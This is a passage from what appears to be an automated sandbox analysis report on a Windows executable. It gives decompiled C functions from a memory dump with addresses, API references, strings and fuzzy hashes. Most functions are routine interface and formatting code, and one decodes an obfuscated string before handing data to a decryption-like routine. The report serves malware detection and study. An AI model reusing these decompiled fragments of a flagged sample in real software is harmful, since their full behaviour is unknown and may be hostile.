						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}

0x0040684d
0x0040685c
0x00406866
0x0040686d
0x00406872
0x00406875
0x0040687a
0x0040687d
0x00406883
0x00406886
0x00406889
0x0040689a
0x004068a6
0x004068ab
0x004068bb
0x004068c5
0x004068c9
0x004068ce
0x004068d9
0x004068e1
0x004068e4
0x004068e7
0x004068e7
0x004068ea
0x004068ea
0x004068f0
0x004068f1
0x004068f4
0x004068f7
0x004068ff

APIs

memset.MSVCRT ref: 0040686D
sprintf.MSVCRT ref: 0040689A
strlen.MSVCRT ref: 004068A6
memcpy.MSVCRT ref: 004068BB
strlen.MSVCRT ref: 004068C9
memcpy.MSVCRT ref: 004068D9

Strings

%s (%s), xrefs: 00406894

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpystrlen$memsetsprintf
String ID: %s (%s)
API String ID: 3756086014-1363028141
Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E906, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040E906(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}

0x0040e906
0x0040e90d
0x0040e91d
0x0040e92a
0x0040e92e
0x00000000
0x0040e956
0x0040e956
0x0040e95c
0x0040e960
0x0040e960
0x0040e966
0x0040e971
0x0040e975
0x00000000
0x0040e97d

APIs

UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
memcpy.MSVCRT ref: 0040E966
CoTaskMemFree.OLE32(?,?), ref: 0040E975

Strings

00000000-0000-0000-0000-000000000000, xrefs: 0040E925
5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FromStringUuid$FreeTaskmemcpy
String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
API String ID: 1640410171-3316789007
Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407D0A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00407D0A(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E004118A0(0x1004, _t17);
				_t21 =  *0x4171b8;
				if( *0x4171b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4172c0, "dialog_%d",  *0x417300);
					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407CAD, 0);
				}
				return _t8;
			}

0x00407d12
0x00407d17
0x00407d1e
0x00407d2e
0x00407d35
0x00407d4a
0x00407d65
0x00407d71
0x00407d71
0x00000000
0x00407d81
0x00407d88

APIs

memset.MSVCRT ref: 00407D35
sprintf.MSVCRT ref: 00407D4A

Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45

SetWindowTextA.USER32(?,?), ref: 00407D71
EnumChildWindows.USER32 ref: 00407D81

Strings

dialog_%d, xrefs: 00407D40
caption, xrefs: 00407D56

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
String ID: caption$dialog_%d
API String ID: 246480800-4161923789
Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E

Uniqueness

Uniqueness Score: -1.00%

Function 00406491, Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406491(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}

0x00406491
0x004064a8
0x004064ad
0x004064b9
0x004064bc
0x004064c9
0x004064e1
0x004064f5
0x00406511

APIs

GetDC.USER32(00000000), ref: 0040649C
GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
ReleaseDC.USER32 ref: 004064BC
GetWindowRect.USER32 ref: 004064C9
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CapsDeviceWindow$MoveRectRelease
String ID:
API String ID: 3197862061-0
Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406585, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					sprintf( &_v260, "%2.2X");
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00406585
0x0040659d
0x004065a4
0x004065a9
0x004065ac
0x004065af
0x004065b1
0x004065b8
0x004065c5
0x004065ca
0x004065cf
0x004065d7
0x004065dd
0x004065e2
0x004065e6
0x004065ec
0x004065f4
0x004065fa
0x004065ec
0x00406603
0x00406608
0x00406610
0x00406617

APIs

memset.MSVCRT ref: 004065A4
sprintf.MSVCRT ref: 004065C5
strcat.MSVCRT(?,00413078), ref: 004065D7
strcat.MSVCRT(?,00413084,00000000), ref: 004065F4
strcat.MSVCRT(?,00000000), ref: 00406603

Strings

%2.2X, xrefs: 004065BF

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcat$memsetsprintf
String ID: %2.2X
API String ID: 582077193-791839006
Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798

Uniqueness

Uniqueness Score: -1.00%

Function 004078FF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E004078FF(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x417540 == 0) {
					E0040787D();
				}
				_t40 =  *0x417538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4171b8 == 0) {
							_push( *0x417548 - 1);
							_push( *0x41752c);
							_push(_t39);
							_push(E00407A55());
							goto L16;
						} else {
							strcpy(0x4172c0, "strings");
							_t31 = E00407D89(_t39,  *0x41752c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x417548 - 1);
								_push( *0x41752c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41752c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x417548 - 1);
						_push( *0x41752c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x416b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x412466;
					} else {
						_t23 =  *0x41753c;
						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x417528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41752c, _t10);
							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
							 *( *0x417530 +  *0x417538 * 4) = _t39;
							 *0x417538 =  *0x417538 + 1;
							 *0x41753c =  *0x41753c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}

0x004078ff
0x00407906
0x00407908
0x00407908
0x0040790d
0x00407914
0x00407919
0x0040792b
0x0040792b
0x0040791b
0x0040791b
0x00407926
0x00407929
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407929
0x0040795f
0x0040795f
0x0040792d
0x0040792f
0x00407a50
0x00407a50
0x00407935
0x0040793b
0x0040796e
0x004079ba
0x004079bb
0x004079c1
0x004079c7
0x00000000
0x00407970
0x0040797a
0x00407986
0x0040798b
0x00407990
0x004079a4
0x004079aa
0x004079ab
0x004079b1
0x00000000
0x00407992
0x0040799d
0x004079a2
0x00000000
0x00000000
0x004079a2
0x00407990
0x0040793d
0x00407943
0x00407944
0x0040794d
0x0040794e
0x0040794e
0x004079c8
0x004079ce
0x004079d0
0x004079d0
0x004079d2
0x00407a49
0x00407a49
0x004079d4
0x004079d4
0x004079e3
0x00000000
0x004079f3
0x004079f9
0x004079fc
0x00407a07
0x00407a1d
0x00407a2b
0x00407a36
0x00407a42
0x00407a47
0x00000000
0x00000000
0x00000000
0x00000000
0x00407a47
0x004079e3
0x004079d2
0x00407a54

APIs

strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74784DE0), ref: 0040797A

Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA

strlen.MSVCRT ref: 00407998
LoadStringA.USER32 ref: 004079C8
memcpy.MSVCRT ref: 00407A07

Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1

Strings

strings, xrefs: 00407970

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$LoadString_itoamemcpystrcpystrlen
String ID: strings
API String ID: 1748916193-3030018805
Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F037, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040F037(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040f03e
0x0040f046
0x0040f04e
0x0040f056
0x0040f063
0x0040f063
0x0040f066
0x0040f070

APIs

LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,770B48C0,00405C41,00000000), ref: 0040F040
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
FreeLibrary.KERNEL32(00000000), ref: 0040F066

Strings

shlwapi.dll, xrefs: 0040F039
SHAutoComplete, xrefs: 0040F048

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8

Uniqueness

Uniqueness Score: -1.00%

Function 00407406, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046D7( &_v1068);
						if(E004047A0( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t27 =  &_a8; // 0x407626
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060D0(0xff, _t75,  *_t27);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047F1( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}

0x00407412
0x00407415
0x0040741a
0x0040741c
0x00407422
0x00407428
0x00407428
0x00407428
0x00407429
0x0040754a
0x00407438
0x00407446
0x0040744d
0x00407455
0x00407459
0x00407461
0x00407467
0x0040749b
0x0040749b
0x004074a1
0x004074ad
0x004074b6
0x004074bf
0x004074d0
0x004074d7
0x004074e1
0x004074e3
0x004074ed
0x004074ef
0x004074ef
0x004074fc
0x00407503
0x0040750a
0x0040750f
0x00407512
0x00407518
0x00407520
0x00407530
0x00407535
0x00407535
0x004074e1
0x00000000
0x00407541
0x0040746e
0x00407471
0x00407472
0x00407484
0x00407486
0x0040748d
0x0040748e
0x00407491
0x00407491
0x00407492
0x00407492
0x00000000
0x00407472

APIs

strlen.MSVCRT ref: 00407415
memset.MSVCRT ref: 0040744D
memcpy.MSVCRT ref: 0040750A
LocalFree.KERNEL32(?,?,?,?,?,7614ED80,?,00000000), ref: 00407535

Strings

&v@, xrefs: 0040750F

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FreeLocalmemcpymemsetstrlen
String ID: &v@
API String ID: 3110682361-3426253984
Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C8, Relevance: 7.5, APIs: 5, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4C8(void* __eax) {
				void* __esi;
				void* _t16;
				void* _t33;
				void* _t38;
				void* _t41;

				_t41 = __eax;
				_t16 = E00401033();
				if(_t16 == 0x5cb8) {
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
					E00405E2C();
					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
					E0040A437(_t41);
					SetCursor( *0x416b98);
					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
				}
				return _t16;
			}

0x0040a4c9
0x0040a4cb
0x0040a4d5
0x0040a4f5
0x0040a4f7
0x0040a504
0x0040a518
0x0040a522
0x0040a52f
0x0040a532
0x0040a53d
0x0040a54f
0x00000000
0x0040a569
0x0040a56b

APIs

SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A4F5

Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A

SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A518

Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
Part of subcall function 0040A437: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0

SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A566

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
String ID:
API String ID: 2210206837-0
Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10

Uniqueness

Uniqueness Score: -1.00%

Function 00409867, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409018(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405EFD(_a4,  &_v516);
			}

0x00409881
0x00409883
0x0040988a
0x00409899
0x004098a0
0x004098ad
0x004098b9
0x004098bd
0x004098c3
0x004098d7
0x004098f1

APIs

memset.MSVCRT ref: 0040988A
memset.MSVCRT ref: 004098A0

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mxt,00000000,?,?,004092ED,00000001,00412B1C,74784DE0), ref: 00405F17

Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060

sprintf.MSVCRT ref: 004098D7

Strings

<%s>, xrefs: 004098D1
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3202206310-1998499579
Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408572, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00408572(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L004115D6();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L004115D6();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L004115D6();
						 *_t18 = 0;
					}
					_push(_t18);
					L004115D6();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}

0x00408572
0x00408572
0x0040857b
0x0040857d
0x0040857e
0x00408583
0x00408584
0x00408589
0x0040858b
0x0040858c
0x00408591
0x00408592
0x0040859a
0x0040859c
0x0040859d
0x004085a2
0x004085a3
0x004085ab
0x004085ad
0x004085b1
0x004085b3
0x004085b4
0x004085ba
0x004085ba
0x004085bc
0x004085bd
0x004085c2
0x004085c4
0x004085ca
0x004085cd
0x004085d0
0x004085d7

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040857E
??3@YAXPAX@Z.MSVCRT ref: 0040858C
??3@YAXPAX@Z.MSVCRT ref: 0040859D
??3@YAXPAX@Z.MSVCRT ref: 004085B4
??3@YAXPAX@Z.MSVCRT ref: 004085BD

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18

Uniqueness

Uniqueness Score: -1.00%

Function 004085D8, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004085D8(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
